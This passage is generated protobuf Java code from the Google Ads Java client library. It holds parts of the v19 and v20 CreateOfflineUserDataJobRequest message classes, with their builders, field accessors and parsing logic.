(other.getEnableMatchRateRangePreview() != false) { setEnableMatchRateRangePreview(other.getEnableMatchRateRangePreview()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { customerId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage( getJobFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 case 40: { enableMatchRateRangePreview_ = input.readBool(); bitField0_ |= 0x00000008; break; } // case 40 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. 
*/ public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } else { return (java.lang.String) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The customerId to set. * @return This builder for chaining. */ public Builder setCustomerId( java.lang.String value) { if (value == null) { throw new NullPointerException(); } customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return This builder for chaining. */ public Builder clearCustomerId() { customerId_ = getDefaultInstance().getCustomerId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The bytes for customerId to set. * @return This builder for chaining. 
*/ public Builder setCustomerIdBytes( com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.ads.googleads.v19.resources.OfflineUserDataJob job_; private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.OfflineUserDataJob, com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder> jobBuilder_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ public boolean hasJob() { return ((bitField0_ & 0x00000002) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. */ public com.google.ads.googleads.v19.resources.OfflineUserDataJob getJob() { if (jobBuilder_ == null) { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } else { return jobBuilder_.getMessage(); } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob(com.google.ads.googleads.v19.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (value == null) { throw new NullPointerException(); } job_ = value; } else { jobBuilder_.setMessage(value); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. 
* </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder setJob( com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder builderForValue) { if (jobBuilder_ == null) { job_ = builderForValue.build(); } else { jobBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000002; onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder mergeJob(com.google.ads.googleads.v19.resources.OfflineUserDataJob value) { if (jobBuilder_ == null) { if (((bitField0_ & 0x00000002) != 0) && job_ != null && job_ != com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance()) { getJobBuilder().mergeFrom(value); } else { job_ = value; } } else { jobBuilder_.mergeFrom(value); } if (job_ != null) { bitField0_ |= 0x00000002; onChanged(); } return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public Builder clearJob() { bitField0_ = (bitField0_ & ~0x00000002); job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } onChanged(); return this; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder getJobBuilder() { bitField0_ |= 0x00000002; onChanged(); return getJobFieldBuilder().getBuilder(); } /** * <pre> * Required. The offline user data job to be created. 
* </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ public com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { if (jobBuilder_ != null) { return jobBuilder_.getMessageOrBuilder(); } else { return job_ == null ? com.google.ads.googleads.v19.resources.OfflineUserDataJob.getDefaultInstance() : job_; } } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v19.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.OfflineUserDataJob, com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder> getJobFieldBuilder() { if (jobBuilder_ == null) { jobBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.OfflineUserDataJob, com.google.ads.googleads.v19.resources.OfflineUserDataJob.Builder, com.google.ads.googleads.v19.resources.OfflineUserDataJobOrBuilder>( getJob(), getParentForChildren(), isClean()); job_ = null; } return jobBuilder_; } private boolean validateOnly_ ; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @param value The validateOnly to set. * @return This builder for chaining. */ public Builder setValidateOnly(boolean value) { validateOnly_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * <pre> * If true, the request is validated but not executed. 
Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return This builder for chaining. */ public Builder clearValidateOnly() { bitField0_ = (bitField0_ & ~0x00000004); validateOnly_ = false; onChanged(); return this; } private boolean enableMatchRateRangePreview_ ; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. */ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @param value The enableMatchRateRangePreview to set. * @return This builder for chaining. */ public Builder setEnableMatchRateRangePreview(boolean value) { enableMatchRateRangePreview_ = value; bitField0_ |= 0x00000008; onChanged(); return this; } /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return This builder for chaining. 
*/ public Builder clearEnableMatchRateRangePreview() { bitField0_ = (bitField0_ & ~0x00000008); enableMatchRateRangePreview_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest) private static final com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest(); } public static com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> PARSER = new com.google.protobuf.AbstractParser<CreateOfflineUserDataJobRequest>() { @java.lang.Override public CreateOfflineUserDataJobRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return 
builder.buildPartial(); } }; public static com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CreateOfflineUserDataJobRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,977
google-ads-stubs-v20/src/main/java/com/google/ads/googleads/v20/services/CreateOfflineUserDataJobRequest.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v20/services/offline_user_data_job_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v20.services; /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v20.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. * </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest} */ public final class CreateOfflineUserDataJobRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) CreateOfflineUserDataJobRequestOrBuilder { private static final long serialVersionUID = 0L; // Use CreateOfflineUserDataJobRequest.newBuilder() to construct. private CreateOfflineUserDataJobRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CreateOfflineUserDataJobRequest() { customerId_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CreateOfflineUserDataJobRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.Builder.class); } private int 
bitField0_; public static final int CUSTOMER_ID_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. */ @java.lang.Override public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ @java.lang.Override public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int JOB_FIELD_NUMBER = 2; private com.google.ads.googleads.v20.resources.OfflineUserDataJob job_; /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return Whether the job field is set. */ @java.lang.Override public boolean hasJob() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> * @return The job. 
*/ @java.lang.Override public com.google.ads.googleads.v20.resources.OfflineUserDataJob getJob() { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } /** * <pre> * Required. The offline user data job to be created. * </pre> * * <code>.google.ads.googleads.v20.resources.OfflineUserDataJob job = 2 [(.google.api.field_behavior) = REQUIRED];</code> */ @java.lang.Override public com.google.ads.googleads.v20.resources.OfflineUserDataJobOrBuilder getJobOrBuilder() { return job_ == null ? com.google.ads.googleads.v20.resources.OfflineUserDataJob.getDefaultInstance() : job_; } public static final int VALIDATE_ONLY_FIELD_NUMBER = 3; private boolean validateOnly_ = false; /** * <pre> * If true, the request is validated but not executed. Only errors are * returned, not results. * </pre> * * <code>bool validate_only = 3;</code> * @return The validateOnly. */ @java.lang.Override public boolean getValidateOnly() { return validateOnly_; } public static final int ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER = 5; private boolean enableMatchRateRangePreview_ = false; /** * <pre> * If true, match rate range for the offline user data job is calculated and * made available in the resource. * </pre> * * <code>bool enable_match_rate_range_preview = 5;</code> * @return The enableMatchRateRangePreview. 
*/ @java.lang.Override public boolean getEnableMatchRateRangePreview() { return enableMatchRateRangePreview_; } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getJob()); } if (validateOnly_ != false) { output.writeBool(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { output.writeBool(5, enableMatchRateRangePreview_); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(customerId_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, customerId_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getJob()); } if (validateOnly_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(3, validateOnly_); } if (enableMatchRateRangePreview_ != false) { size += com.google.protobuf.CodedOutputStream .computeBoolSize(5, enableMatchRateRangePreview_); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest)) { return super.equals(obj); } com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest other = 
(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) obj; if (!getCustomerId() .equals(other.getCustomerId())) return false; if (hasJob() != other.hasJob()) return false; if (hasJob()) { if (!getJob() .equals(other.getJob())) return false; } if (getValidateOnly() != other.getValidateOnly()) return false; if (getEnableMatchRateRangePreview() != other.getEnableMatchRateRangePreview()) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + CUSTOMER_ID_FIELD_NUMBER; hash = (53 * hash) + getCustomerId().hashCode(); if (hasJob()) { hash = (37 * hash) + JOB_FIELD_NUMBER; hash = (53 * hash) + getJob().hashCode(); } hash = (37 * hash) + VALIDATE_ONLY_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getValidateOnly()); hash = (37 * hash) + ENABLE_MATCH_RATE_RANGE_PREVIEW_FIELD_NUMBER; hash = (53 * hash) + com.google.protobuf.Internal.hashBoolean( getEnableMatchRateRangePreview()); hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public 
static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static 
com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * Request message for * [OfflineUserDataJobService.CreateOfflineUserDataJob][google.ads.googleads.v20.services.OfflineUserDataJobService.CreateOfflineUserDataJob]. 
* </pre> * * Protobuf type {@code google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.class, com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.Builder.class); } // Construct using com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getJobFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; customerId_ = ""; job_ = null; if (jobBuilder_ != null) { jobBuilder_.dispose(); jobBuilder_ = null; } validateOnly_ = false; enableMatchRateRangePreview_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return 
com.google.ads.googleads.v20.services.OfflineUserDataJobServiceProto.internal_static_google_ads_googleads_v20_services_CreateOfflineUserDataJobRequest_descriptor; } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest getDefaultInstanceForType() { return com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest build() { com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest buildPartial() { com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest result = new com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.customerId_ = customerId_; } int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000002) != 0)) { result.job_ = jobBuilder_ == null ? 
job_ : jobBuilder_.build(); to_bitField0_ |= 0x00000001; } if (((from_bitField0_ & 0x00000004) != 0)) { result.validateOnly_ = validateOnly_; } if (((from_bitField0_ & 0x00000008) != 0)) { result.enableMatchRateRangePreview_ = enableMatchRateRangePreview_; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest) { return mergeFrom((com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest other) { if (other == com.google.ads.googleads.v20.services.CreateOfflineUserDataJobRequest.getDefaultInstance()) return this; if (!other.getCustomerId().isEmpty()) { customerId_ = other.customerId_; bitField0_ |= 0x00000001; onChanged(); } if (other.hasJob()) { mergeJob(other.getJob()); } if (other.getValidateOnly() != false) { setValidateOnly(other.getValidateOnly()); } if 
(other.getEnableMatchRateRangePreview() != false) { setEnableMatchRateRangePreview(other.getEnableMatchRateRangePreview()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { customerId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { input.readMessage( getJobFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000002; break; } // case 18 case 24: { validateOnly_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 case 40: { enableMatchRateRangePreview_ = input.readBool(); bitField0_ |= 0x00000008; break; } // case 40 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object customerId_ = ""; /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The customerId. 
*/ public java.lang.String getCustomerId() { java.lang.Object ref = customerId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); customerId_ = s; return s; } else { return (java.lang.String) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return The bytes for customerId. */ public com.google.protobuf.ByteString getCustomerIdBytes() { java.lang.Object ref = customerId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8( (java.lang.String) ref); customerId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The customerId to set. * @return This builder for chaining. */ public Builder setCustomerId( java.lang.String value) { if (value == null) { throw new NullPointerException(); } customerId_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @return This builder for chaining. */ public Builder clearCustomerId() { customerId_ = getDefaultInstance().getCustomerId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * <pre> * Required. The ID of the customer for which to create an offline user data * job. * </pre> * * <code>string customer_id = 1 [(.google.api.field_behavior) = REQUIRED];</code> * @param value The bytes for customerId to set. * @return This builder for chaining. 
